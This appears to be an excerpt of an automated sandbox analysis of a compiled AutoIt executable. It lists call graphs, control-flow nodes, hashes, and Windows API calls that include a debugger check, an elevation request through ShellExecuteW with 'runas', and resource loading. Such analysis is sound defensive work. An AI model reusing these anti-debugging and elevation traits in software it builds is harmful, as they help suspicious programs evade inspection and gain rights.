327bb9 95228->95180 95314 327a94 47 API calls 4 library calls 95229->95314 95231 327ba1 GetCurrentThreadId 95231->95180 95233 32acbf __fcloseall 95232->95233 95234 327cf4 __lock 47 API calls 95233->95234 95235 32acc6 95234->95235 95236 326986 __calloc_crt 47 API calls 95235->95236 95238 32acd7 95236->95238 95237 32ad42 GetStartupInfoW 95246 32ae80 95237->95246 95248 32ad57 95237->95248 95238->95237 95239 32ace2 __fcloseall @_EH4_CallFilterFunc@8 95238->95239 95239->95184 95240 32af44 95324 32af58 LeaveCriticalSection _doexit 95240->95324 95242 32aec9 GetStdHandle 95242->95246 95243 326986 __calloc_crt 47 API calls 95243->95248 95244 32aedb GetFileType 95244->95246 95245 32ada5 95245->95246 95249 32add7 GetFileType 95245->95249 95250 32ade5 InitializeCriticalSectionAndSpinCount 95245->95250 95246->95240 95246->95242 95246->95244 95247 32af08 InitializeCriticalSectionAndSpinCount 95246->95247 95247->95246 95248->95243 95248->95245 95248->95246 95249->95245 95249->95250 95250->95245 95252 325ead 95251->95252 95253 332e8e 95251->95253 95258 332a7b GetModuleFileNameW 95252->95258 95325 3269d0 47 API calls _W_store_winword 95253->95325 95256 332eb4 _memcpy_s 95257 332eca FreeEnvironmentStringsW 95256->95257 95257->95252 95259 332aaf _wparse_cmdline 95258->95259 95260 325eb7 95259->95260 95261 332ae9 95259->95261 95260->95192 95298 32115b 47 API calls 3 library calls 95260->95298 95326 3269d0 47 API calls _W_store_winword 95261->95326 95263 332aef _wparse_cmdline 95263->95260 95265 332ccd __NMSG_WRITE 95264->95265 95266 332cc5 95264->95266 95267 326986 __calloc_crt 47 API calls 95265->95267 95266->95195 95268 332cf6 __NMSG_WRITE 95267->95268 95268->95266 95270 326986 __calloc_crt 47 API calls 95268->95270 95271 332d4d 95268->95271 95272 332d72 95268->95272 95275 332d89 95268->95275 95327 332567 47 API calls __controlfp_s 95268->95327 95269 321c9d _free 47 API calls 95269->95266 95270->95268 95271->95269 95273 321c9d _free 47 API calls 95272->95273 95273->95266 95328 326e20 IsProcessorFeaturePresent 95275->95328 95277 332d95 95277->95195 95279 3211a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95278->95279 95281 3211e0 __IsNonwritableInCurrentImage 95279->95281 95343 320f0a 52 API calls __cinit 95279->95343 95281->95199 95283 371ebf 95282->95283 95284 303a29 95282->95284 95285 303a63 IsThemeActive 95284->95285 95344 321405 95285->95344 95289 303a8f 95356 303adb SystemParametersInfoW SystemParametersInfoW 95289->95356 95291 303a9b 95357 303d19 95291->95357 95293 303aa3 SystemParametersInfoW 95294 303ac8 95293->95294 95294->95203 95295->95177 95296->95181 95297->95189 95301->95204 95302->95207 95303->95213 95304->95215 95305->95219 95306->95220 95309 32698d 95307->95309 95310 3269ca 95309->95310 95311 3269ab Sleep 95309->95311 95316 3330aa 95309->95316 95310->95224 95313 327ec9 TlsSetValue 95310->95313 95312 3269c2 95311->95312 95312->95309 95312->95310 95313->95227 95314->95231 95315->95228 95317 3330b5 95316->95317 95322 3330d0 __calloc_impl 95316->95322 95318 3330c1 95317->95318 95317->95322 95323 327c0e 47 API calls __getptd_noexit 95318->95323 95320 3330e0 RtlAllocateHeap 95321 3330c6 95320->95321 95320->95322 95321->95309 95322->95320 95322->95321 95323->95321 95324->95239 95325->95256 95326->95263 95327->95268 95329 326e2b 95328->95329 95334 326cb5 95329->95334 95333 326e46 95333->95277 95335 326ccf _memset ___raise_securityfailure 95334->95335 95336 326cef IsDebuggerPresent 95335->95336 95342 3281ac SetUnhandledExceptionFilter UnhandledExceptionFilter 95336->95342 95338 326db3 ___raise_securityfailure 95339 32a70c _W_store_winword 6 API calls 95338->95339 95340 326dd6 95339->95340 95341 328197 GetCurrentProcess TerminateProcess 95340->95341 95341->95333 95342->95338 95343->95281 95345 327cf4 __lock 47 API calls 95344->95345 95346 321410 95345->95346 95409 327e58 LeaveCriticalSection 95346->95409 95348 303a88 95349 32146d 95348->95349 95350 321491 95349->95350 95351 321477 95349->95351 95350->95289 95351->95350 95410 327c0e 47 API calls __getptd_noexit 95351->95410 95353 321481 95411 326e10 8 API calls __controlfp_s 95353->95411 95355 32148c 95355->95289 95356->95291 95358 303d26 __ftell_nolock 95357->95358 95359 30d7f7 48 API calls 95358->95359 95360 303d31 GetCurrentDirectoryW 95359->95360 95412 3061ca 95360->95412 95362 303d57 IsDebuggerPresent 95363 303d65 95362->95363 95364 371cc1 MessageBoxA 95362->95364 95365 303e3a 95363->95365 95367 371cd9 95363->95367 95368 303d82 95363->95368 95364->95367 95366 303e41 SetCurrentDirectoryW 95365->95366 95373 303e4e Mailbox 95366->95373 95588 31c682 48 API calls 95367->95588 95486 3040e5 95368->95486 95373->95293 95374 371ce9 95377 371cff SetCurrentDirectoryW 95374->95377 95377->95373 95409->95348 95410->95353 95411->95355 95590 31e99b 95412->95590 95416 3061eb 95417 305374 50 API calls 95416->95417 95418 3061ff 95417->95418 95419 30ce19 48 API calls 95418->95419 95420 30620c 95419->95420 95607 3039db 95420->95607 95422 306216 Mailbox 95423 306eed 48 API calls 95422->95423 95424 30622b 95423->95424 95619 309048 95424->95619 95427 30ce19 48 API calls 95428 306244 95427->95428 95622 30d6e9 95428->95622 95430 306254 Mailbox 95431 30ce19 48 API calls 95430->95431 95432 30627c 95431->95432 95433 30d6e9 55 API calls 95432->95433 95434 30628f Mailbox 95433->95434 95435 30ce19 48 API calls 95434->95435 95436 3062a0 95435->95436 95437 30d645 53 API calls 95436->95437 95438 3062b2 Mailbox 95437->95438 95439 30d7f7 48 API calls 95438->95439 95440 3062c5 95439->95440 95626 3063fc 95440->95626 95444 3062df 95445 3062e9 95444->95445 95446 371c08 95444->95446 95447 320fa7 _W_store_winword 59 API calls 95445->95447 95448 3063fc 48 API calls 95446->95448 95449 3062f4 95447->95449 95450 371c1c 95448->95450 95449->95450 95451 3062fe 95449->95451 95452 3063fc 48 API calls 95450->95452 95453 320fa7 _W_store_winword 59 API calls 95451->95453 95454 371c38 95452->95454 95455 306309 95453->95455 95457 305374 50 API calls 95454->95457 95455->95454 95456 306313 95455->95456 95458 320fa7 _W_store_winword 59 API calls 95456->95458 95459 371c5d 95457->95459 95460 30631e 95458->95460 95461 3063fc 48 API calls 95459->95461 95462 30635f 95460->95462 95464 371c86 95460->95464 95468 3063fc 48 API calls 95460->95468 95465 371c69 95461->95465 95463 30636c 95462->95463 95462->95464 95470 31c050 48 API calls 95463->95470 95466 306eed 48 API calls 95464->95466 95467 306eed 48 API calls 95465->95467 95469 371ca8 95466->95469 95471 371c77 95467->95471 95472 306342 95468->95472 95474 3063fc 48 API calls 95469->95474 95475 306384 95470->95475 95476 3063fc 48 API calls 95471->95476 95473 306eed 48 API calls 95472->95473 95477 306350 95473->95477 95478 371cb5 95474->95478 95479 311b90 48 API calls 95475->95479 95476->95464 95480 3063fc 48 API calls 95477->95480 95478->95478 95483 306394 95479->95483 95480->95462 95481 311b90 48 API calls 95481->95483 95483->95481 95484 3063fc 48 API calls 95483->95484 95485 3063d6 Mailbox 95483->95485 95642 306b68 48 API calls 95483->95642 95484->95483 95485->95362 95487 3040f2 __ftell_nolock 95486->95487 95488 37370e _memset 95487->95488 95489 30410b 95487->95489 95492 37372a GetOpenFileNameW 95488->95492 95490 30660f 49 API calls 95489->95490 95491 304114 95490->95491 95685 3040a7 95491->95685 95494 373779 95492->95494 95496 306a63 48 API calls 95494->95496 95497 37378e 95496->95497 95497->95497 95499 304129 95703 304139 95499->95703 95588->95374 95591 30d7f7 48 API calls 95590->95591 95592 3061db 95591->95592 95593 306009 95592->95593 95594 306016 __ftell_nolock 95593->95594 95595 306a63 48 API calls 95594->95595 95600 30617c Mailbox 95594->95600 95597 306048 95595->95597 95606 30607e Mailbox 95597->95606 95643 3061a6 95597->95643 95598 3061a6 48 API calls 95598->95606 95599 30614f 95599->95600 95601 30ce19 48 API calls 95599->95601 95600->95416 95603 306170 95601->95603 95602 30ce19 48 API calls 95602->95606 95604 3064cf 48 API calls 95603->95604 95604->95600 95605 3064cf 48 API calls 95605->95606 95606->95598 95606->95599 95606->95600 95606->95602 95606->95605 95608 3041a9 136 API calls 95607->95608 95609 3039fe 95608->95609 95610 303a06 95609->95610 95646 34c396 95609->95646 95610->95422 95613 372ff0 95615 321c9d _free 47 API calls 95613->95615 95614 304252 84 API calls 95614->95613 95616 372ffd 95615->95616 95617 304252 84 API calls 95616->95617 95618 373006 95617->95618 95618->95618 95620 31f4ea 48 API calls 95619->95620 95621 306237 95620->95621 95621->95427 95623 30d6f4 95622->95623 95624 30d71b 95623->95624 95681 30d764 55 API calls 95623->95681 95624->95430 95627 306406 95626->95627 95628 30641f 95626->95628 95629 306eed 48 API calls 95627->95629 95630 306a63 48 API calls 95628->95630 95631 3062d1 95629->95631 95630->95631 95632 320fa7 95631->95632 95633 320fb3 95632->95633 95634 321028 95632->95634 95641 320fd8 95633->95641 95682 327c0e 47 API calls __getptd_noexit 95633->95682 95684 32103a 59 API calls 3 library calls 95634->95684 95637 321035 95637->95444 95638 320fbf 95683 326e10 8 API calls __controlfp_s 95638->95683 95640 320fca 95640->95444 95641->95444 95642->95483 95644 30bdfa 48 API calls 95643->95644 95645 3061b1 95644->95645 95645->95597 95647 304517 83 API calls 95646->95647 95648 34c405 95647->95648 95649 34c56d 94 API calls 95648->95649 95650 34c417 95649->95650 95651 3044ed 64 API calls 95650->95651 95677 34c41b 95650->95677 95652 34c432 95651->95652 95653 3044ed 64 API calls 95652->95653 95654 34c442 95653->95654 95655 3044ed 64 API calls 95654->95655 95656 34c45d 95655->95656 95657 3044ed 64 API calls 95656->95657 95658 34c478 95657->95658 95659 304517 83 API calls 95658->95659 95660 34c48f 95659->95660 95661 32395c _W_store_winword 47 API calls 95660->95661 95662 34c496 95661->95662 95663 32395c _W_store_winword 47 API calls 95662->95663 95664 34c4a0 95663->95664 95665 3044ed 64 API calls 95664->95665 95666 34c4b4 95665->95666 95667 34bf5a GetSystemTimeAsFileTime 95666->95667 95668 34c4c7 95667->95668 95669 34c4f1 95668->95669 95670 34c4dc 95668->95670 95672 34c556 95669->95672 95673 34c4f7 95669->95673 95671 321c9d _free 47 API calls 95670->95671 95675 34c4e2 95671->95675 95674 321c9d _free 47 API calls 95672->95674 95676 34b965 118 API calls 95673->95676 95674->95677 95678 321c9d _free 47 API calls 95675->95678 95679 34c54e 95676->95679 95677->95613 95677->95614 95678->95677 95680 321c9d _free 47 API calls 95679->95680 95680->95677 95681->95624 95682->95638 95683->95640 95684->95637 95686 32f8a0 __ftell_nolock 95685->95686 95687 3040b4 GetLongPathNameW 95686->95687 95688 306a63 48 API calls 95687->95688 95689 3040dc 95688->95689 95690 3049a0 95689->95690 95691 30d7f7 48 API calls 95690->95691 95692 3049b2 95691->95692 95693 30660f 49 API calls 95692->95693 95694 3049bd 95693->95694 95695 372e35 95694->95695 95696 3049c8 95694->95696 95701 372e4f 95695->95701 95743 31d35e 60 API calls 95695->95743 95697 3064cf 48 API calls 95696->95697 95699 3049d4 95697->95699 95737 3028a6 95699->95737 95702 3049e7 Mailbox 95702->95499 95704 3041a9 136 API calls 95703->95704 95705 30415e 95704->95705 95706 373489 95705->95706 95707 3041a9 136 API calls 95705->95707 95708 34c396 122 API calls 95706->95708 95709 304172 95707->95709 95710 37349e 95708->95710 95709->95706 95713 30417a 95709->95713 95711 3734a2 95710->95711 95712 3734bf 95710->95712 95714 304252 84 API calls 95711->95714 95715 31f4ea 48 API calls 95712->95715 95716 304186 95713->95716 95717 3734aa 95713->95717 95714->95717 95728 373504 Mailbox 95715->95728 95744 30c833 95716->95744 95838 346b49 87 API calls _wprintf 95717->95838 95720 3734b8 95720->95712 95722 3736b4 95723 321c9d _free 47 API calls 95722->95723 95724 3736bc 95723->95724 95725 304252 84 API calls 95724->95725 95727 3736c5 95725->95727 95726 30ba85 48 API calls 95726->95728 95731 321c9d _free 47 API calls 95727->95731 95733 304252 84 API calls 95727->95733 95842 3425b5 86 API calls 4 library calls 95727->95842 95728->95722 95728->95726 95728->95727 95734 30ce19 48 API calls 95728->95734 95832 304dd9 95728->95832 95839 342551 48 API calls _memcpy_s 95728->95839 95840 342472 60 API calls 2 library calls 95728->95840 95841 349c12 48 API calls 95728->95841 95731->95727 95733->95727 95734->95728 95738 3028b8 95737->95738 95742 3028d7 _memcpy_s 95737->95742 95740 31f4ea 48 API calls 95738->95740 95739 31f4ea 48 API calls 95741 3028ee 95739->95741 95740->95742 95741->95702 95742->95739 95743->95695 95745 30c843 __ftell_nolock 95744->95745 95746 30c860 95745->95746 95747 373095 95745->95747 95848 3048ba 49 API calls 95746->95848 95864 3425b5 86 API calls 4 library calls 95747->95864 95750 3730a8 95865 3425b5 86 API calls 4 library calls 95750->95865 95751 30c882 95849 304550 56 API calls 95751->95849 95753 30c897 95753->95750 95755 30c89f 95753->95755 95757 30d7f7 48 API calls 95755->95757 95756 3730c4 95786 30c90c 95756->95786 95758 30c8ab 95757->95758 95850 31e968 49 API calls __ftell_nolock 95758->95850 95760 30c8b7 95763 30d7f7 48 API calls 95760->95763 95761 3730d7 95765 304907 CloseHandle 95761->95765 95762 30c91a 95764 321dfc __wsplitpath 47 API calls 95762->95764 95766 30c8c3 95763->95766 95774 30c943 _wcscat _wcscpy 95764->95774 95767 3730e3 95765->95767 95768 30660f 49 API calls 95766->95768 95769 3041a9 136 API calls 95767->95769 95771 30c8d1 95768->95771 95770 37310d 95769->95770 95772 373136 95770->95772 95775 34c396 122 API calls 95770->95775 95866 3425b5 86 API calls 4 library calls 95772->95866 95778 30c96d SetCurrentDirectoryW 95774->95778 95780 373129 95775->95780 95779 31f4ea 48 API calls 95778->95779 95783 30c988 95779->95783 95784 373152 95780->95784 95785 373131 95780->95785 95782 37314d 95787 3047b7 48 API calls 95783->95787 95786->95761 95786->95762 95819 30c993 Mailbox __NMSG_WRITE 95787->95819 95833 304dec 95832->95833 95836 304e9a 95832->95836 95834 31f4ea 48 API calls 95833->95834 95837 304e1e 95833->95837 95834->95837 95835 31f4ea 48 API calls 95835->95837 95836->95728 95837->95835 95837->95836 95838->95720 95839->95728 95840->95728 95841->95728 95842->95727 95848->95751 95849->95753 95850->95760 95864->95750 95865->95756 95866->95782

                                                                            Executed Functions

                                                                            Function 0032B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 958 32b043-32b080 call 32f8a0 961 32b082-32b084 958->961 962 32b089-32b08b 958->962 965 32b860-32b86c call 32a70c 961->965 963 32b0ac-32b0d9 962->963 964 32b08d-32b0a7 call 327bda call 327c0e call 326e10 962->964 967 32b0e0-32b0e7 963->967 968 32b0db-32b0de 963->968 964->965 972 32b105 967->972 973 32b0e9-32b100 call 327bda call 327c0e call 326e10 967->973 968->967 971 32b10b-32b110 968->971 976 32b112-32b11c call 32f82f 971->976 977 32b11f-32b12d call 333bf2 971->977 972->971 1001 32b851-32b854 973->1001 976->977 988 32b133-32b145 977->988 989 32b44b-32b45d 977->989 988->989 991 32b14b-32b183 call 327a0d GetConsoleMode 988->991 992 32b463-32b473 989->992 993 32b7b8-32b7d5 WriteFile 989->993 991->989 1014 32b189-32b18f 991->1014 999 32b55a-32b55f 992->999 1000 32b479-32b484 992->1000 996 32b7e1-32b7e7 GetLastError 993->996 997 32b7d7-32b7df 993->997 1002 32b7e9 996->1002 997->1002 1003 32b663-32b66e 999->1003 1004 32b565-32b56e 999->1004 1006 32b48a-32b49a 1000->1006 1007 32b81b-32b833 1000->1007 1013 32b85e-32b85f 1001->1013 1011 32b7ef-32b7f1 1002->1011 1003->1007 1010 32b674 1003->1010 1004->1007 1012 32b574 1004->1012 1015 32b4a0-32b4a3 1006->1015 1008 32b835-32b838 1007->1008 1009 32b83e-32b84e call 327c0e call 327bda 1007->1009 1008->1009 1018 32b83a-32b83c 1008->1018 1009->1001 1019 32b67e-32b693 1010->1019 1021 32b7f3-32b7f5 1011->1021 1022 32b856-32b85c 1011->1022 1023 32b57e-32b595 1012->1023 1013->965 1024 32b191-32b193 1014->1024 1025 32b199-32b1bc GetConsoleCP 1014->1025 1016 32b4a5-32b4be 1015->1016 1017 32b4e9-32b520 WriteFile 1015->1017 1028 32b4c0-32b4ca 1016->1028 1029 32b4cb-32b4e7 1016->1029 1017->996 1030 32b526-32b538 1017->1030 1018->1013 1031 32b699-32b69b 1019->1031 1021->1007 1033 32b7f7-32b7fc 1021->1033 1022->1013 1034 32b59b-32b59e 1023->1034 1024->989 1024->1025 1026 32b1c2-32b1ca 1025->1026 1027 32b440-32b446 1025->1027 1035 32b1d4-32b1d6 1026->1035 1027->1021 1028->1029 1029->1015 1029->1017 1030->1011 1036 32b53e-32b54f 1030->1036 1037 32b6d8-32b719 WideCharToMultiByte 1031->1037 1038 32b69d-32b6b3 1031->1038 1040 32b812-32b819 call 327bed 1033->1040 1041 32b7fe-32b810 call 327c0e call 327bda 1033->1041 1042 32b5a0-32b5b6 1034->1042 1043 32b5de-32b627 WriteFile 1034->1043 1046 32b36b-32b36e 1035->1046 1047 32b1dc-32b1fe 1035->1047 1036->1006 1048 32b555 1036->1048 1037->996 1052 32b71f-32b721 1037->1052 1049 32b6c7-32b6d6 1038->1049 1050 32b6b5-32b6c4 1038->1050 1040->1001 1041->1001 1054 32b5b8-32b5ca 1042->1054 1055 32b5cd-32b5dc 1042->1055 1043->996 1045 32b62d-32b645 1043->1045 1045->1011 1057 32b64b-32b658 1045->1057 1060 32b370-32b373 1046->1060 1061 32b375-32b3a2 1046->1061 1058 32b200-32b215 1047->1058 1059 32b217-32b223 call 321688 1047->1059 1048->1011 1049->1031 1049->1037 1050->1049 1062 32b727-32b75a WriteFile 1052->1062 1054->1055 1055->1034 1055->1043 1057->1023 1064 32b65e 1057->1064 1065 32b271-32b283 call 3340f7 1058->1065 1079 32b225-32b239 1059->1079 1080 32b269-32b26b 1059->1080 1060->1061 1067 32b3a8-32b3ab 1060->1067 1061->1067 1068 32b77a-32b78e GetLastError 1062->1068 1069 32b75c-32b776 1062->1069 1064->1011 1084 32b435-32b43b 1065->1084 1085 32b289 1065->1085 1073 32b3b2-32b3c5 call 335884 1067->1073 1074 32b3ad-32b3b0 1067->1074 1071 32b794-32b796 1068->1071 1069->1062 1076 32b778 1069->1076 1071->1002 1078 32b798-32b7b0 1071->1078 1073->996 1091 32b3cb-32b3d5 1073->1091 1074->1073 1081 32b407-32b40a 1074->1081 1076->1071 1078->1019 1086 32b7b6 1078->1086 1088 32b412-32b42d 1079->1088 1089 32b23f-32b254 call 3340f7 1079->1089 1080->1065 1081->1035 1087 32b410 1081->1087 1084->1002 1092 32b28f-32b2c4 WideCharToMultiByte 1085->1092 1086->1011 1087->1084 1088->1084 1089->1084 1100 32b25a-32b267 1089->1100 1094 32b3d7-32b3ee call 335884 1091->1094 1095 32b3fb-32b401 1091->1095 1092->1084 1096 32b2ca-32b2f0 WriteFile 1092->1096 1094->996 1103 32b3f4-32b3f5 1094->1103 1095->1081 1096->996 1099 32b2f6-32b30e 1096->1099 1099->1084 1102 32b314-32b31b 1099->1102 1100->1092 1102->1095 1104 32b321-32b34c WriteFile 1102->1104 1103->1095 1104->996 1105 32b352-32b359 1104->1105 1105->1084 1106 32b35f-32b366 1105->1106 1106->1095
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 17b100a62c49d36fea2f6b100c96aad0f940b786e0b086efe80b777f0f29e50f
                                                                            • Instruction ID: 93f2bf33824f849b3371a467e5c36cb3fcf1220f6e517a2cb96f3b19def44383
                                                                            • Opcode Fuzzy Hash: 17b100a62c49d36fea2f6b100c96aad0f940b786e0b086efe80b777f0f29e50f
                                                                            • Instruction Fuzzy Hash: ED326075B022688BCB26DF54EC81AE9B7B9FF46310F1541D9E40AE7A91D7309D80CF52
                                                                            Function 00303D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00303AA3,?), ref: 00303D45
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,00303AA3,?), ref: 00303D57
                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,003C1148,003C1130,?,?,?,?,00303AA3,?), ref: 00303DC8
                                                                              • Part of subcall function 00306430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00303DEE,003C1148,?,?,?,?,?,00303AA3,?), ref: 00306471
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,00303AA3,?), ref: 00303E48
                                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003B28F4,00000010), ref: 00371CCE
                                                                            • SetCurrentDirectoryW.KERNEL32(?,003C1148,?,?,?,?,?,00303AA3,?), ref: 00371D06
                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0039DAB4,003C1148,?,?,?,?,?,00303AA3,?), ref: 00371D89
                                                                            • ShellExecuteW.SHELL32(00000000,?,?,?,?,00303AA3), ref: 00371D90
                                                                              • Part of subcall function 00303E6E: GetSysColorBrush.USER32(0000000F), ref: 00303E79
                                                                              • Part of subcall function 00303E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00303E88
                                                                              • Part of subcall function 00303E6E: LoadIconW.USER32(00000063), ref: 00303E9E
                                                                              • Part of subcall function 00303E6E: LoadIconW.USER32(000000A4), ref: 00303EB0
                                                                              • Part of subcall function 00303E6E: LoadIconW.USER32(000000A2), ref: 00303EC2
                                                                              • Part of subcall function 00303E6E: RegisterClassExW.USER32(?), ref: 00303F30
                                                                              • Part of subcall function 003036B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003036E6
                                                                              • Part of subcall function 003036B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00303707
                                                                              • Part of subcall function 003036B8: ShowWindow.USER32(00000000,?,?,?,?,00303AA3,?), ref: 0030371B
                                                                              • Part of subcall function 003036B8: ShowWindow.USER32(00000000,?,?,?,?,00303AA3,?), ref: 00303724
                                                                              • Part of subcall function 00304FFC: _memset.LIBCMT ref: 00305022
                                                                              • Part of subcall function 00304FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003050CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                            • String ID: ();$This is a third-party compiled AutoIt script.$runas
                                                                            • API String ID: 438480954-580701920
                                                                            • Opcode ID: 00c64bf18a21f362ae18341a945538fd93a0c571fe424007c9e3adf13065365b
                                                                            • Instruction ID: ae2511ba593a8a72771fb71074358f7d12d5618a2f37416c1ea8310a8c61f3fa
                                                                            • Opcode Fuzzy Hash: 00c64bf18a21f362ae18341a945538fd93a0c571fe424007c9e3adf13065365b
                                                                            • Instruction Fuzzy Hash: 62512832A05248AECF13ABF4DC62EEE7B7D9F06704F044168F201AA1D3CB785A45DB21
                                                                            Function 0031DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1355 31ddc0-31de4f call 30d7f7 GetVersionExW call 306a63 call 31dfb4 call 306571 1364 31de55-31de56 1355->1364 1365 3724c8-3724cb 1355->1365 1368 31de92-31dea2 call 31df77 1364->1368 1369 31de58-31de63 1364->1369 1366 3724e4-3724e8 1365->1366 1367 3724cd 1365->1367 1372 3724d3-3724dc 1366->1372 1373 3724ea-3724f3 1366->1373 1371 3724d0 1367->1371 1382 31dea4-31dec1 GetCurrentProcess call 31df5f 1368->1382 1383 31dec7-31dee1 1368->1383 1374 31de69-31de6b 1369->1374 1375 37244e-372454 1369->1375 1371->1372 1372->1366 1373->1371 1379 3724f5-3724f8 1373->1379 1380 31de71-31de74 1374->1380 1381 372469-372475 1374->1381 1377 372456-372459 1375->1377 1378 37245e-372464 1375->1378 1377->1368 1378->1368 1379->1372 1386 372495-372498 1380->1386 1387 31de7a-31de89 1380->1387 1384 372477-37247a 1381->1384 1385 37247f-372485 1381->1385 1382->1383 1406 31dec3 1382->1406 1389 31df31-31df3b GetSystemInfo 1383->1389 1390 31dee3-31def7 call 31e00c 1383->1390 1384->1368 1385->1368 1386->1368 1391 37249e-3724b3 1386->1391 1392 37248a-372490 1387->1392 1393 31de8f 1387->1393 1395 31df0e-31df1a 1389->1395 1403 31df29-31df2f GetSystemInfo 1390->1403 1404 31def9-31df01 call 31dff4 GetNativeSystemInfo 1390->1404 1397 3724b5-3724b8 1391->1397 1398 3724bd-3724c3 1391->1398 1392->1368 1393->1368 1399 31df21-31df26 1395->1399 1400 31df1c-31df1f FreeLibrary 1395->1400 1397->1368 1398->1368 1400->1399 1405 31df03-31df07 1403->1405 1404->1405 1405->1395 1408 31df09-31df0c FreeLibrary 1405->1408 1406->1383 1408->1395
                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(?), ref: 0031DDEC
                                                                            • GetCurrentProcess.KERNEL32(00000000,0039DC38,?,?), ref: 0031DEAC
                                                                            • GetNativeSystemInfo.KERNELBASE(?,0039DC38,?,?), ref: 0031DF01
                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 0031DF0C
                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 0031DF1F
                                                                            • GetSystemInfo.KERNEL32(?,0039DC38,?,?), ref: 0031DF29
                                                                            • GetSystemInfo.KERNEL32(?,0039DC38,?,?), ref: 0031DF35
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                            • String ID:
                                                                            • API String ID: 3851250370-0
                                                                            • Opcode ID: 0be72cb198a4ca3c33056fc2b642f7344f6a21b5d35606120cc149f3192fd7cf
                                                                            • Instruction ID: 71e9383b8fe4ff8becfcb5695880ba48f8076d03929136c941153bc1509aded4
                                                                            • Opcode Fuzzy Hash: 0be72cb198a4ca3c33056fc2b642f7344f6a21b5d35606120cc149f3192fd7cf
                                                                            • Instruction Fuzzy Hash: CC61857180A384DFCF1BCF6998C15EA7FB46F2A300F1A85D9D8499F247C624CA49CB65
                                                                            Function 0030406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1427 30406b-304083 CreateStreamOnHGlobal 1428 3040a3-3040a6 1427->1428 1429 304085-30409c FindResourceExW 1427->1429 1430 374f16-374f25 LoadResource 1429->1430 1431 3040a2 1429->1431 1430->1431 1432 374f2b-374f39 SizeofResource 1430->1432 1431->1428 1432->1431 1433 374f3f-374f4a LockResource 1432->1433 1433->1431 1434 374f50-374f6e 1433->1434 1434->1431
                                                                            APIs
